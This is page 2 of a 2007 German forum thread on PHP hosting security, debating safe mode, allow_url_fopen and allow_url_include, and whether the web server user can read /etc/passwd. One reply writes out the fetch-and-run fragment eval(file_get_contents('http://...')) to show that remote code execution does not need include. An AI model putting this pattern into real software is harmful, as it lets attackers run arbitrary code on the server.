AGB  ·  Datenschutz  ·  Impressum  







Anmelden
Nützliche Links
Registrieren
Zurück Delphi-PRAXiS Programmierung allgemein Programmieren allgemein [PHP] Dateien und Verzeichnisse löschen

[PHP] Dateien und Verzeichnisse löschen

Ein Thema von Matze · begonnen am 17. Apr 2007 · letzter Beitrag vom 17. Apr 2007
Antwort Antwort
Seite 2 von 2     12
Benutzerbild von yankee
yankee

Registriert seit: 10. Mär 2004
1.134 Beiträge
 
Lazarus
 
#11

Re: [PHP] Dateien und Verzeichnisse löschen

  Alt 17. Apr 2007, 15:56
@alcaeus:
Wenn der Server dir gehört kannst du den natürlich so konfigurieren. Ich farge mich zwar, warum du den url-warpper ausschalten willst (warum Möglichkeiten nehmen? Wenn du es nicht brauchst, benutz es eben nicht. Ich benutze die auch nirgends im Produktiveinsatz. Aber mal eben schnell um was zu testen, können die verdammt praktisch sein), aber vorallem meine ich den Safe Mode.
Wenn du noch 10 andere Deppen hast, die sich den Server mit dir teilen, sollen die ja nicht in der Lage sein mit php an Systemdatei zu kommen. Oder auch nicht an die php-Dateien der anderen User usw. usw.

Und jetzt bin ich mal gespannt, wie du das ohne Safe Mode unterbinden willst.
Letzter Tipp: Drogen. Machen zwar nicht glücklich, geben einem aber wenigstens das Gefühl glücklich zu sein.

Have a lot of fun!
  Mit Zitat antworten Zitat
Benutzerbild von alcaeus
alcaeus

Registriert seit: 11. Aug 2003
Ort: München
6.537 Beiträge
 
#12

Re: [PHP] Dateien und Verzeichnisse löschen

  Alt 17. Apr 2007, 17:02
@yankee: indem ich das nicht auf PHP-Ebene, sondern auf server-Ebene verbiete. So soll der Webserver-Benutzer keinen Zugriff auf die Passwort-Datei haben, etc.

allow_url_fopen auf aus ist ne Sicherheitsmassnahme, die man aber auch net unbedingt braucht - die Funktionalitaet die man dadurch verliert kann man sich bspw. mit fsockopen() nachbilden.
BTW, PHP6 wird den Parameter trennen: allow_url_fopen gilt nur noch fuer fopen(), fuer include, require, und die jeweiligen _once-Pendants gibts allow_url_include. include() ist uebrigens der Grund, warum ich es sicherheitshalber deaktiviere - Remote Code Execution ist dadurch unmoeglich.

Greetz
alcaeus
Andreas B.
Die Mutter der Dummen ist immer schwanger.
Ein Portal für Informatik-Studenten: www.infler.de
  Mit Zitat antworten Zitat
Benutzerbild von yankee
yankee

Registriert seit: 10. Mär 2004
1.134 Beiträge
 
Lazarus
 
#13

Re: [PHP] Dateien und Verzeichnisse löschen

  Alt 17. Apr 2007, 17:10
Zitat von alcaeus:
@yankee: indem ich das nicht auf PHP-Ebene, sondern auf server-Ebene verbiete. So soll der Webserver-Benutzer keinen Zugriff auf die Passwort-Datei haben, etc.
In der Theorie stimmt das. Aber in der Praxis hast du bei Linux bei jedem Mist ja meistens erstmal Leserechte für alle. Und für viele Dateien ist das ja auch wichtig. In der /etc/passwd stehen ja nicht nur Passwörter sondern sind die id->name zuordnungen, die jeder braucht. Gut, dafür gibt es die shadowdatei, aber es gibt nur viel zu viele Informationen, die man über ein anzugreifendes System so herausbekommt .
Zitat von alcaeus:
include() ist uebrigens der Grund, warum ich es sicherheitshalber deaktiviere - Remote Code Execution ist dadurch unmoeglich.
eval(file_get_contents('http://...')); ?
Oder eben ein etwas komplizierterer Nachbau über sockets. Es geht jedenfalls auch ohne include.
Mal abgesehn davon: Wenn du es einmal geschafft hast den RemoteExecution-Auslöse-Code in deinen qt zu bekommen... Dann bekomtm der angreife auch so alles da rein, was er will .
Letzter Tipp: Drogen. Machen zwar nicht glücklich, geben einem aber wenigstens das Gefühl glücklich zu sein.

Have a lot of fun!
  Mit Zitat antworten Zitat
Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche
Ansicht

Forumregeln

Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are aus

Gehe zu:

Impressum · AGB · Datenschutz · Nach oben
Alle Zeitangaben in WEZ +1. Es ist jetzt 23:50 Uhr.
Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024 by Thomas Breitkreuz